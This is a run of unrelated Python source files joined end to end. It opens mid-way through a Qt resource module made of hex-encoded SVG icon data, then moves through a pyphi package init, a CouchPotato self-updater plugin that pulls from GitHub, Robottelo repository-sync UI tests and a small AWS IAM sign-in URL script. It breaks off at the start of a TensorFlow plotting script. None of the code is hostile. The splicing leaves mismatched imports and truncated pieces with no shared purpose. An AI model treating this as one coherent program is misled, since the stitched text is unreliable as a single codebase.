\x34\x33\x35\x39\x31\x20\x31\x31\x2e\x31\x31\x38\x37\x30\x32\x38\
\x31\x33\x20\x31\x35\x2e\x33\x33\x30\x31\x33\x35\x34\x32\x37\x39\
\x20\x31\x31\x2e\x31\x35\x38\x36\x38\x36\x31\x30\x34\x39\x20\x43\
\x20\x31\x35\x2e\x33\x33\x36\x33\x37\x36\x34\x39\x36\x38\x20\x31\
\x31\x2e\x31\x39\x38\x36\x36\x39\x33\x39\x36\x39\x20\x31\x35\x2e\
\x33\x34\x32\x36\x31\x37\x35\x36\x35\x36\x20\x31\x31\x2e\x32\x33\
\x38\x39\x30\x39\x32\x30\x33\x37\x20\x31\x35\x2e\x33\x34\x38\x38\
\x35\x38\x36\x33\x34\x34\x20\x31\x31\x2e\x32\x37\x39\x33\x37\x32\
\x39\x38\x36\x37\x20\x43\x20\x31\x35\x2e\x33\x35\x35\x30\x39\x39\
\x37\x30\x33\x33\x20\x31\x31\x2e\x33\x31\x39\x38\x33\x36\x37\x36\
\x39\x36\x20\x31\x35\x2e\x33\x36\x31\x33\x34\x30\x37\x37\x32\x31\
\x20\x31\x31\x2e\x33\x36\x30\x35\x32\x35\x38\x37\x33\x20\x31\x35\
\x2e\x33\x36\x37\x35\x38\x31\x38\x34\x31\x20\x31\x31\x2e\x34\x30\
\x31\x34\x30\x37\x35\x39\x38\x35\x20\x43\x20\x31\x35\x2e\x33\x37\
\x33\x38\x32\x32\x39\x30\x39\x38\x20\x31\x31\x2e\x34\x34\x32\x32\
\x38\x39\x33\x32\x33\x39\x20\x31\x35\x2e\x33\x38\x30\x30\x36\x33\
\x39\x37\x38\x36\x20\x31\x31\x2e\x34\x38\x33\x33\x36\x34\x38\x32\
\x37\x32\x20\x31\x35\x2e\x33\x38\x36\x33\x30\x35\x30\x34\x37\x35\
\x20\x31\x31\x2e\x35\x32\x34\x36\x30\x31\x33\x30\x30\x36\x20\x43\
\x20\x31\x35\x2e\x33\x39\x32\x35\x34\x36\x31\x31\x36\x33\x20\x31\
\x31\x2e\x35\x36\x35\x38\x33\x37\x37\x37\x34\x20\x31\x35\x2e\x33\
\x39\x38\x37\x38\x37\x31\x38\x35\x31\x20\x31\x31\x2e\x36\x30\x37\
\x32\x33\x36\x31\x38\x33\x20\x31\x35\x2e\x34\x30\x35\x30\x32\x38\
\x32\x35\x34\x20\x31\x31\x2e\x36\x34\x38\x37\x36\x33\x36\x36\x31\
\x36\x20\x43\x20\x31\x35\x2e\x34\x31\x31\x32\x36\x39\x33\x32\x32\
\x38\x20\x31\x31\x2e\x36\x39\x30\x32\x39\x31\x31\x34\x30\x31\x20\
\x31\x35\x2e\x34\x31\x37\x35\x31\x30\x33\x39\x31\x36\x20\x31\x31\
\x2e\x37\x33\x31\x39\x34\x38\x34\x36\x31\x36\x20\x31\x35\x2e\x34\
\x32\x33\x37\x35\x31\x34\x36\x30\x35\x20\x31\x31\x2e\x37\x37\x33\
\x37\x30\x32\x37\x35\x32\x35\x20\x43\x20\x31\x35\x2e\x34\x32\x39\
\x39\x39\x32\x35\x32\x39\x33\x20\x31\x31\x2e\x38\x31\x35\x34\x35\
\x37\x30\x34\x33\x35\x20\x31\x35\x2e\x34\x33\x36\x32\x33\x33\x35\
\x39\x38\x31\x20\x31\x31\x2e\x38\x35\x37\x33\x30\x38\x38\x38\x34\
\x31\x20\x31\x35\x2e\x34\x34\x32\x34\x37\x34\x36\x36\x37\x20\x31\
\x31\x2e\x38\x39\x39\x32\x32\x35\x34\x34\x34\x20\x43\x20\x31\x35\
\x2e\x34\x34\x38\x37\x31\x35\x37\x33\x35\x38\x20\x31\x31\x2e\x39\
\x34\x31\x31\x34\x32\x30\x30\x34\x20\x31\x35\x2e\x34\x35\x34\x39\
\x35\x36\x38\x30\x34\x37\x20\x31\x31\x2e\x39\x38\x33\x31\x32\x33\
\x36\x36\x39\x36\x20\x31\x35\x2e\x34\x36\x31\x31\x39\x37\x38\x37\
\x33\x35\x20\x31\x32\x2e\x30\x32\x35\x31\x33\x37\x37\x30\x34\x35\
\x20\x43\x20\x31\x35\x2e\x34\x36\x37\x34\x33\x38\x39\x34\x32\x33\
\x20\x31\x32\x2e\x30\x36\x37\x31\x35\x31\x37\x33\x39\x33\x20\x31\
\x35\x2e\x34\x37\x33\x36\x38\x30\x30\x31\x31\x32\x20\x31\x32\x2e\
\x31\x30\x39\x31\x39\x38\x33\x33\x35\x31\x20\x31\x35\x2e\x34\x37\
\x39\x39\x32\x31\x30\x38\x20\x31\x32\x2e\x31\x35\x31\x32\x34\x34\
\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\
\x22\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\
\x3a\x23\x66\x66\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\
\x77\x69\x64\x74\x68\x3a\x30\x2e\x39\x34\x34\x38\x38\x31\x38\x39\
\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\
\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\
\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0a\
\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
"

qt_resource_name = b"\
\x00\x05\
\x00\x6f\xa6\x53\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x73\
\x00\x04\
\x00\x06\xa8\xa1\
\x00\x64\
\x00\x61\x00\x74\x00\x61\
\x00\x0c\
\x05\x21\x11\x87\
\x00\x64\
\x00\x65\x00\x63\x00\x6f\x00\x64\x00\x69\x00\x6e\x00\x67\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x05\x9e\x54\xa7\
\x00\x6c\
\x00\x6f\x00\x63\x00\x6b\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0a\
\x08\x3b\xcb\xa7\
\x00\x65\
\x00\x71\x00\x75\x00\x61\x00\x6c\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0b\
\x0c\x31\xc5\x47\
\x00\x73\
\x00\x6e\x00\x69\x00\x66\x00\x66\x00\x65\x00\x72\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x1e\
\x09\xc6\x50\xc7\
\x00\x73\
\x00\x70\x00\x6c\x00\x69\x00\x74\x00\x74\x00\x65\x00\x72\x00\x5f\x00\x68\x00\x61\x00\x6e\x00\x64\x00\x6c\x00\x65\x00\x5f\x00\x68\
\x00\x6f\x00\x72\x00\x69\x00\x7a\x00\x6f\x00\x6e\x00\x74\x00\x61\x00\x6c\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x03\xc6\x54\x27\
\x00\x70\
\x00\x6c\x00\x75\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0c\
\x06\xf5\x2f\xa7\
\x00\x73\
\x00\x70\x00\x65\x00\x63\x00\x74\x00\x72\x00\x75\x00\x6d\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0a\
\x05\x95\xd0\xa7\
\x00\x75\
\x00\x6e\x00\x6c\x00\x6f\x00\x63\x00\x6b\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0b\
\x0a\xb1\xba\xa7\
\x00\x61\
\x00\x70\x00\x70\x00\x69\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0d\
\x0f\x6b\x5c\x47\
\x00\x65\
\x00\x71\x00\x75\x00\x61\x00\x6c\x00\x73\x00\x5f\x00\x71\x00\x6d\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x1c\
\x08\x58\xf4\x07\
\x00\x73\
\x00\x70\x00\x6c\x00\x69\x00\x74\x00\x74\x00\x65\x00\x72\x00\x5f\x00\x68\x00\x61\x00\x6e\x00\x64\x00\x6c\x00\x65\x00\x5f\x00\x76\
\x00\x65\x00\x72\x00\x74\x00\x69\x00\x63\x00\x61\x00\x6c\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0e\
\x07\x59\x16\x87\
\x00\x6d\
\x00\x6f\x00\x64\x00\x75\x00\x6c\x00\x61\x00\x74\x00\x69\x00\x6f\x00\x6e\x00\x2e\x00\x73\x00\x76\x00\x67\
"

qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x10\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x0c\x00\x00\x00\x04\
\x00\x00\x00\xca\x00\x00\x00\x00\x00\x01\x00\x00\x3e\xd9\
\x00\x00\x00\x1e\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\xfe\x00\x00\x00\x00\x00\x01\x00\x00\x52\x1c\
\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x01\x00\x00\x07\x2b\
\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x01\x00\x00\x49\x15\
\x00\x00\x01\x92\x00\x00\x00\x00\x00\x01\x00\x00\x98\xbc\
\x00\x00\x00\x52\x00\x00\x00\x00\x00\x01\x00\x00\x14\x8d\
\x00\x00\x01\x54\x00\x00\x00\x00\x00\x01\x00\x00\x8f\x48\
\x00\x00\x00\x88\x00\x00\x00\x00\x00\x01\x00\x00\x35\xc3\
\x00\x00\x01\x18\x00\x00\x00\x00\x00\x01\x00\x00\x5f\x2c\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x1f\x7a\
\x00\x00\x01\x34\x00\x00\x00\x00\x00\x01\x00\x00\x84\x04\
"

qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x10\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x0c\x00\x00\x00\x04\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\xca\x00\x00\x00\x00\x00\x01\x00\x00\x3e\xd9\
\x00\x00\x01\x60\x08\x38\xde\x1c\
\x00\x00\x00\x1e\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x60\x08\x38\xde\x1b\
\x00\x00\x00\xfe\x00\x00\x00\x00\x00\x01\x00\x00\x52\x1c\
\x00\x00\x01\x60\x08\x38\xde\x1d\
\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x01\x00\x00\x07\x2b\
\x00\x00\x01\x60\x08\x38\xde\x1c\
\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x01\x00\x00\x49\x15\
\x00\x00\x01\x60\x08\x38\xde\x1d\
\x00\x00\x01\x92\x00\x00\x00\x00\x00\x01\x00\x00\x98\xbc\
\x00\x00\x01\x60\x08\x38\xde\x1c\
\x00\x00\x00\x52\x00\x00\x00\x00\x00\x01\x00\x00\x14\x8d\
\x00\x00\x01\x60\x08\x38\xde\x1b\
\x00\x00\x01\x54\x00\x00\x00\x00\x00\x01\x00\x00\x8f\x48\
\x00\x00\x01\x60\x08\x38\xde\x1d\
\x00\x00\x00\x88\x00\x00\x00\x00\x00\x01\x00\x00\x35\xc3\
\x00\x00\x01\x60\x08\x38\xde\x1d\
\x00\x00\x01\x18\x00\x00\x00\x00\x00\x01\x00\x00\x5f\x2c\
\x00\x00\x01\x60\x08\x38\xde\x1b\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x1f\x7a\
\x00\x00\x01\x60\x08\x38\xde\x1c\
\x00\x00\x01\x34\x00\x00\x00\x00\x00\x01\x00\x00\x84\x04\
\x00\x00\x01\x60\x08\x38\xde\x1b\
"

qt_version = QtCore.qVersion().split('.')
if qt_version < ['5', '8', '0']:
    rcc_version = 1
    qt_resource_struct = qt_resource_struct_v1
else:
    rcc_version = 2
    qt_resource_struct = qt_resource_struct_v2

def qInitResources():
    QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)

def qCleanupResources():
    QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)

qInitResources()

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# compute/__init__.py

"""
See |compute.subsystem|, |compute.network|, |compute.distance|, and
|compute.parallel| for documentation.

Attributes:
    all_complexes: Alias for :func:`pyphi.compute.network.all_complexes`.
    ces: Alias for :func:`pyphi.compute.subsystem.ces`.
    ces_distance: Alias for :func:`pyphi.compute.distance.ces_distance`.
    complexes: Alias for :func:`pyphi.compute.network.complexes`.
    concept_distance: Alias for
        :func:`pyphi.compute.distance.concept_distance`.
    conceptual_info: Alias for :func:`pyphi.compute.subsystem.conceptual_info`.
    condensed: Alias for :func:`pyphi.compute.network.condensed`.
    evaluate_cut: Alias for :func:`pyphi.compute.subsystem.evaluate_cut`.
    major_complex: Alias for :func:`pyphi.compute.network.major_complex`.
    phi: Alias for :func:`pyphi.compute.subsystem.phi`.
    possible_complexes: Alias for
        :func:`pyphi.compute.network.possible_complexes`.
    sia: Alias for :func:`pyphi.compute.subsystem.sia`.
    subsystems: Alias for :func:`pyphi.compute.network.subsystems`.
"""

# pylint: disable=unused-import

from .distance import ces_distance, concept_distance
from .network import (
    all_complexes,
    complexes,
    condensed,
    major_complex,
    possible_complexes,
    subsystems,
)
from .subsystem import (
    ConceptStyleSystem,
    SystemIrreducibilityAnalysisConceptStyle,
    ces,
    concept_cuts,
    conceptual_info,
    evaluate_cut,
    phi,
    sia,
    sia_concept_style,
)

from couchpotato.api import addApiView
from couchpotato.core.event import addEvent, fireEvent, fireEventAsync
from couchpotato.core.helpers.encoding import ss
from couchpotato.core.helpers.request import jsonified
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
from datetime import datetime
from dateutil.parser import parse
from git.repository import LocalRepository
import json
import os
import shutil
import tarfile
import time
import traceback
import version

log = CPLog(__name__)


class Updater(Plugin):

    available_notified = False

    def __init__(self):

        if Env.get('desktop'):
            self.updater = DesktopUpdater()
        elif os.path.isdir(os.path.join(Env.get('app_dir'), '.git')):
            self.updater = GitUpdater(self.conf('git_command', default = 'git'))
        else:
            self.updater = SourceUpdater()

        fireEvent('schedule.interval', 'updater.check', self.autoUpdate, hours = 6)
        addEvent('app.load', self.autoUpdate)
        addEvent('updater.info', self.info)

        addApiView('updater.info', self.getInfo, docs = {
            'desc': 'Get updater information',
            'return': {
                'type': 'object',
                'example': """{
        'last_check': "last checked for update",
        'update_version': "available update version or empty",
        'version': current_cp_version
}"""}
        })
        addApiView('updater.update', self.doUpdateView)
        addApiView('updater.check', self.checkView, docs = {
            'desc': 'Check for available update',
            'return': {'type': 'see updater.info'}
        })

    def autoUpdate(self):
        if self.check() and self.conf('automatic') and not self.updater.update_failed:
            if self.updater.doUpdate():

                # Notify before restarting
                try:
                    if self.conf('notification'):
                        info = self.updater.info()
                        version_date = datetime.fromtimestamp(info['update_version']['date'])
                        fireEvent('updater.updated', 'Updated to a new version with hash "%s", this version is from %s' % (info['update_version']['hash'], version_date), data = info)
                except:
                    log.error('Failed notifying for update: %s', traceback.format_exc())

                fireEventAsync('app.restart')

                return True

        return False

    def check(self):
        if self.isDisabled():
            return

        if self.updater.check():
            if not self.available_notified and self.conf('notification') and not self.conf('automatic'):
                fireEvent('updater.available', message = 'A new update is available', data = self.updater.info())
                self.available_notified = True
            return True

        return False

    def info(self):
        return self.updater.info()

    def getInfo(self):
        return jsonified(self.updater.info())

    def checkView(self):
        return jsonified({
            'update_available': self.check(),
            'info': self.updater.info()
        })

    def doUpdateView(self):

        self.check()
        if not self.updater.update_version:
            log.error('Trying to update when no update is available.')
            success = False
        else:
            success = self.updater.doUpdate()
            if success:
                fireEventAsync('app.restart')

            # Assume the updater handles things
            if not success:
                success = True

        return jsonified({
            'success': success
        })


class BaseUpdater(Plugin):

    repo_user = 'jayme-github'
    repo_name = 'CouchPotatoServer'
    branch = version.BRANCH

    version = None
    update_failed = False
    update_version = None
    last_check = 0

    def doUpdate(self):
        pass

    def getInfo(self):
        return jsonified(self.info())

    def info(self):
        return {
            'last_check': self.last_check,
            'update_version': self.update_version,
            'version': self.getVersion(),
            'repo_name': '%s/%s' % (self.repo_user, self.repo_name),
            'branch': self.branch,
        }

    def check(self):
        pass

    def deletePyc(self, only_excess = True):

        for root, dirs, files in os.walk(ss(Env.get('app_dir'))):

            pyc_files = filter(lambda filename: filename.endswith('.pyc'), files)
            py_files = set(filter(lambda filename: filename.endswith('.py'), files))
            excess_pyc_files = filter(lambda pyc_filename: pyc_filename[:-1] not in py_files, pyc_files) if only_excess else pyc_files

            for excess_pyc_file in excess_pyc_files:
                full_path = os.path.join(root, excess_pyc_file)
                log.debug('Removing old PYC file: %s', full_path)
                try:
                    os.remove(full_path)
                except:
                    log.error('Couldn\'t remove %s: %s', (full_path, traceback.format_exc()))

            for dir_name in dirs:
                full_path = os.path.join(root, dir_name)
                if len(os.listdir(full_path)) == 0:
                    try:
                        os.rmdir(full_path)
                    except:
                        log.error('Couldn\'t remove empty directory %s: %s', (full_path, traceback.format_exc()))



class GitUpdater(BaseUpdater):

    def __init__(self, git_command):
        self.repo = LocalRepository(Env.get('app_dir'), command = git_command)

    def doUpdate(self):

        try:
            log.debug('Stashing local changes')
            self.repo.saveStash()

            log.info('Updating to latest version')
            self.repo.pull()

            # Delete leftover .pyc files
            self.deletePyc()

            return True
        except:
            log.error('Failed updating via GIT: %s', traceback.format_exc())

        self.update_failed = True

        return False

    def getVersion(self):

        if not self.version:
            try:
                output = self.repo.getHead() # Yes, please
                log.debug('Git version output: %s', output.hash)
                self.version = {
                    'hash': output.hash[:8],
                    'date': output.getDate(),
                    'type': 'git',
                }
            except Exception, e:
                log.error('Failed using GIT updater, running from source, you need to have GIT installed. %s', e)
                return 'No GIT'

        return self.version

    def check(self):

        if self.update_version:
            return True

        log.info('Checking for new version on github for %s', self.repo_name)
        if not Env.get('dev'):
            self.repo.fetch()

        current_branch = self.repo.getCurrentBranch().name

        for branch in self.repo.getRemoteByName('origin').getBranches():
            if current_branch == branch.name:

                local = self.repo.getHead()
                remote = branch.getHead()

                log.info('Versions, local:%s, remote:%s', (local.hash[:8], remote.hash[:8]))

                if local.getDate() < remote.getDate():
                    self.update_version = {
                        'hash': remote.hash[:8],
                        'date': remote.getDate(),
                    }
                    return True

        self.last_check = time.time()
        return False



class SourceUpdater(BaseUpdater):

    def __init__(self):

        # Create version file in cache
        self.version_file = os.path.join(Env.get('cache_dir'), 'version')
        if not os.path.isfile(self.version_file):
            self.createFile(self.version_file, json.dumps(self.latestCommit()))

    def doUpdate(self):

        try:
            url = 'https://github.com/%s/%s/tarball/%s' % (self.repo_user, self.repo_name, self.branch)
            destination = os.path.join(Env.get('cache_dir'), self.update_version.get('hash') + '.tar.gz')
            extracted_path = os.path.join(Env.get('cache_dir'), 'temp_updater')

            destination = fireEvent('file.download', url = url, dest = destination, single = True)

            # Cleanup leftover from last time
            if os.path.isdir(extracted_path):
                self.removeDir(extracted_path)
            self.makeDir(extracted_path)

            # Extract
            tar = tarfile.open(destination)
            tar.extractall(path = extracted_path)
            tar.close()
            os.remove(destination)

            if self.replaceWith(os.path.join(extracted_path, os.listdir(extracted_path)[0])):
                self.removeDir(extracted_path)

                # Write update version to file
                self.createFile(self.version_file, json.dumps(self.update_version))

                return True
        except:
            log.error('Failed updating: %s', traceback.format_exc())

        self.update_failed = True
        return False

    def replaceWith(self, path):
        app_dir = ss(Env.get('app_dir'))

        # Get list of files we want to overwrite
        self.deletePyc()
        existing_files = []
        for root, subfiles, filenames in os.walk(app_dir):
            for filename in filenames:
                existing_files.append(os.path.join(root, filename))

        for root, subfiles, filenames in os.walk(path):
            for filename in filenames:
                fromfile = os.path.join(root, filename)
                tofile = os.path.join(app_dir, fromfile.replace(path + os.path.sep, ''))

                if not Env.get('dev'):
                    try:
                        if os.path.isfile(tofile):
                            os.remove(tofile)

                        dirname = os.path.dirname(tofile)
                        if not os.path.isdir(dirname):
                            self.makeDir(dirname)

                        shutil.move(fromfile, tofile)
                        try:
                            existing_files.remove(tofile)
                        except ValueError:
                            pass
                    except:
                        log.error('Failed overwriting file "%s": %s', (tofile, traceback.format_exc()))
                        return False

        if Env.get('app_dir') not in Env.get('data_dir'):
            for still_exists in existing_files:
                try:
                    os.remove(still_exists)
                except:
                    log.error('Failed removing non-used file: %s', traceback.format_exc())

        return True


    def removeDir(self, path):
        try:
            if os.path.isdir(path):
                shutil.rmtree(path)
        except OSError, inst:
            os.chmod(inst.filename, 0777)
            self.removeDir(path)

    def getVersion(self):

        if not self.version:
            try:
                f = open(self.version_file, 'r')
                output = json.loads(f.read())
                f.close()

                log.debug('Source version output: %s', output)
                self.version = output
                self.version['type'] = 'source'
            except Exception, e:
                log.error('Failed using source updater. %s', e)
                return {}

        return self.version

    def check(self):

        current_version = self.getVersion()

        try:
            latest = self.latestCommit()

            if latest.get('hash') != current_version.get('hash') and latest.get('date') >= current_version.get('date'):
                self.update_version = latest

            self.last_check = time.time()
        except:
            log.error('Failed updating via source: %s', traceback.format_exc())

        return self.update_version is not None

    def latestCommit(self):
        try:
            url = 'https://api.github.com/repos/%s/%s/commits?per_page=1&sha=%s' % (self.repo_user, self.repo_name, self.branch)
            data = self.getCache('github.commit', url = url)
            commit = json.loads(data)[0]

            return {
                'hash': commit['sha'],
                'date':  int(time.mktime(parse(commit['commit']['committer']['date']).timetuple())),
            }
        except:
            log.error('Failed getting latest request from github: %s', traceback.format_exc())

        return {}


class DesktopUpdater(BaseUpdater):

    def __init__(self):
        self.desktop = Env.get('desktop')

    def doUpdate(self):
        try:
            def do_restart(e):
                if e['status'] == 'done':
                    fireEventAsync('app.restart')
                elif e['status'] == 'error':
                    log.error('Failed updating desktop: %s', e['exception'])
                    self.update_failed = True

            self.desktop._esky.auto_update(callback = do_restart)
            return
        except:
            self.update_failed = True

        return False

    def info(self):
        return {
            'last_check': self.last_check,
            'update_version': self.update_version,
            'version': self.getVersion(),
            'branch': self.branch,
        }

    def check(self):
        current_version = self.getVersion()
        try:
            latest = self.desktop._esky.find_update()

            if latest and latest != current_version.get('hash'):
                self.update_version = {
                    'hash': latest,
                    'date':  None,
                    'changelog': self.desktop._changelogURL,
                }

            self.last_check = time.time()
        except:
            log.error('Failed updating desktop: %s', traceback.format_exc())

        return self.update_version is not None

    def getVersion(self):
        return {
            'hash': self.desktop._esky.active_version,
            'date': None,
            'type': 'desktop',
        }

# -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: metagriffin <mg.github@uberdev.org>
# date: 2012/04/20
# copy: (C) Copyright 2012-EOT metagriffin -- see LICENSE.txt
#------------------------------------------------------------------------------
# This software is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This software is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#------------------------------------------------------------------------------

from .tracker import *
from .merger import *

#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------

"""Test class for Custom Sync UI

:Requirement: Sync

:CaseAutomation: Automated

:CaseLevel: Acceptance

:CaseComponent: Repositories

:TestType: Functional

:CaseImportance: High

:Upstream: No
"""
from fauxfactory import gen_string
from nailgun import entities

from robottelo import manifests
from robottelo.api.utils import enable_rhrepo_and_fetchid
from robottelo.constants import (
    DISTRO_RHEL6, DISTRO_RHEL7,
    DOCKER_REGISTRY_HUB,
    DOCKER_UPSTREAM_NAME,
    FAKE_1_YUM_REPO,
    FEDORA27_OSTREE_REPO,
    REPOS,
    REPOSET,
    REPO_TYPE,
    PRDS,
)
from robottelo.decorators import (
    fixture,
    run_in_one_thread,
    skip_if_not_set,
    tier2,
    upgrade,
    skip_if_bug_open,
)
from robottelo.decorators.host import skip_if_os
from robottelo.products import (
    RepositoryCollection,
    RHELCloudFormsTools,
    SatelliteCapsuleRepository,
)


@fixture(scope='module')
def module_org():
    return entities.Organization().create()


@fixture(scope='module')
def module_custom_product(module_org):
    return entities.Product(organization=module_org).create()


@fixture(scope='module')
def module_org_with_manifest():
    org = entities.Organization().create()
    manifests.upload_manifest_locked(org.id)
    return org


@tier2
def test_positive_sync_custom_repo(session, module_custom_product):
    """Create Content Custom Sync with minimal input parameters

    :id: 00fb0b04-0293-42c2-92fa-930c75acee89

    :expectedresults: Sync procedure is successful

    :CaseImportance: Critical
    """
    repo = entities.Repository(
        url=FAKE_1_YUM_REPO, product=module_custom_product).create()
    with session:
        results = session.sync_status.synchronize([
            (module_custom_product.name, repo.name)])
        assert len(results) == 1
        assert results[0] == 'Syncing Complete.'


@run_in_one_thread
@skip_if_not_set('fake_manifest')
@tier2
@upgrade
def test_positive_sync_rh_repos(session, module_org_with_manifest):
    """Create Content RedHat Sync with two repos.

    :id: e30f6509-0b65-4bcc-a522-b4f3089d3911

    :expectedresults: Sync procedure for RedHat Repos is successful

    :CaseLevel: Integration
    """
    repos = (
        SatelliteCapsuleRepository(cdn=True),
        RHELCloudFormsTools(cdn=True)
    )
    distros = [DISTRO_RHEL7, DISTRO_RHEL6]
    repo_collections = [
        RepositoryCollection(distro=distro, repositories=[repo])
        for distro, repo in zip(distros, repos)
    ]
    for repo_collection in repo_collections:
        repo_collection.setup(module_org_with_manifest.id, synchronize=False)
    repo_paths = [
        (
            repo.repo_data['product'],
            repo.repo_data.get('releasever'),
            repo.repo_data.get('arch'),
            repo.repo_data['name'],
        )
        for repo in repos
    ]
    with session:
        session.organization.select(org_name=module_org_with_manifest.name)
        results = session.sync_status.synchronize(repo_paths)
        assert len(results) == len(repo_paths)
        assert all([result == 'Syncing Complete.' for result in results])


@skip_if_bug_open('bugzilla', 1625783)
@skip_if_os('RHEL6')
@tier2
@upgrade
def test_positive_sync_custom_ostree_repo(session, module_custom_product):
    """Create custom ostree repository and sync it.

    :id: e4119b9b-0356-4661-a3ec-e5807224f7d2

    :expectedresults: ostree repo should be synced successfully

    :CaseLevel: Integration
    """
    repo = entities.Repository(
        content_type='ostree',
        url=FEDORA27_OSTREE_REPO,
        product=module_custom_product,
        unprotected=False,
    ).create()
    with session:
        results = session.sync_status.synchronize([
            (module_custom_product.name, repo.name)])
        assert len(results) == 1
        assert results[0] == 'Syncing Complete.'


@run_in_one_thread
@skip_if_bug_open('bugzilla', 1625783)
@skip_if_os('RHEL6')
@skip_if_not_set('fake_manifest')
@tier2
@upgrade
def test_positive_sync_rh_ostree_repo(session, module_org_with_manifest):
    """Sync CDN based ostree repository.

    :id: 4d28fff0-5fda-4eee-aa0c-c5af02c31de5

    :Steps:
        1. Import a valid manifest
        2. Enable the OStree repo and sync it

    :expectedresults: ostree repo should be synced successfully from CDN

    :CaseLevel: Integration
    """
    enable_rhrepo_and_fetchid(
        basearch=None,
        org_id=module_org_with_manifest.id,
        product=PRDS['rhah'],
        repo=REPOS['rhaht']['name'],
        reposet=REPOSET['rhaht'],
        releasever=None,
    )
    with session:
        session.organization.select(org_name=module_org_with_manifest.name)
        results = session.sync_status.synchronize([
            (PRDS['rhah'], REPOS['rhaht']['name'])])
        assert len(results) == 1
        assert results[0] == 'Syncing Complete.'


@tier2
@upgrade
def test_positive_sync_docker_via_sync_status(session, module_org):
    """Create custom docker repo and sync it via the sync status page.

    :id: 00b700f4-7e52-48ed-98b2-e49b3be102f2

    :expectedresults: Sync procedure for specific docker repository is
        successful

    :CaseLevel: Integration
    """
    product = entities.Product(organization=module_org).create()
    repo_name = gen_string('alphanumeric')
    with session:
        session.repository.create(
            product.name,
            {'name': repo_name,
             'repo_type': REPO_TYPE['docker'],
             'repo_content.upstream_url': DOCKER_REGISTRY_HUB,
             'repo_content.upstream_repo_name': DOCKER_UPSTREAM_NAME}
        )
        assert session.repository.search(product.name, repo_name)[0]['Name'] == repo_name
        result = session.sync_status.synchronize([(product.name, repo_name)])
        assert result[0] == 'Syncing Complete.'

#!/usr/bin/env python

from keyring import get_password
from boto.iam.connection import IAMConnection
import lib.LoadBotoConfig as BotoConfig

from sys import exit

envs = ['dev', 'qa', 'staging', 'demo', 'prod']

for env in envs:
  id = BotoConfig.config.get(env, 'aws_access_key_id')
  key = get_password(BotoConfig.config.get(env, 'keyring'), id)

  conn = IAMConnection(aws_access_key_id=id, aws_secret_access_key=key)
  
  print(conn.get_signin_url())
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 13:37:16 2017
Author: Peiyong Jiang : jiangpeiyong@impcas.ac.cn
Function:
    旋转使得变换。
    

"""


import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np



plt.close('all')

emitX=12
alphaX=-10.
betaX=13.
gammaX=(1.+alphaX**2)/betaX

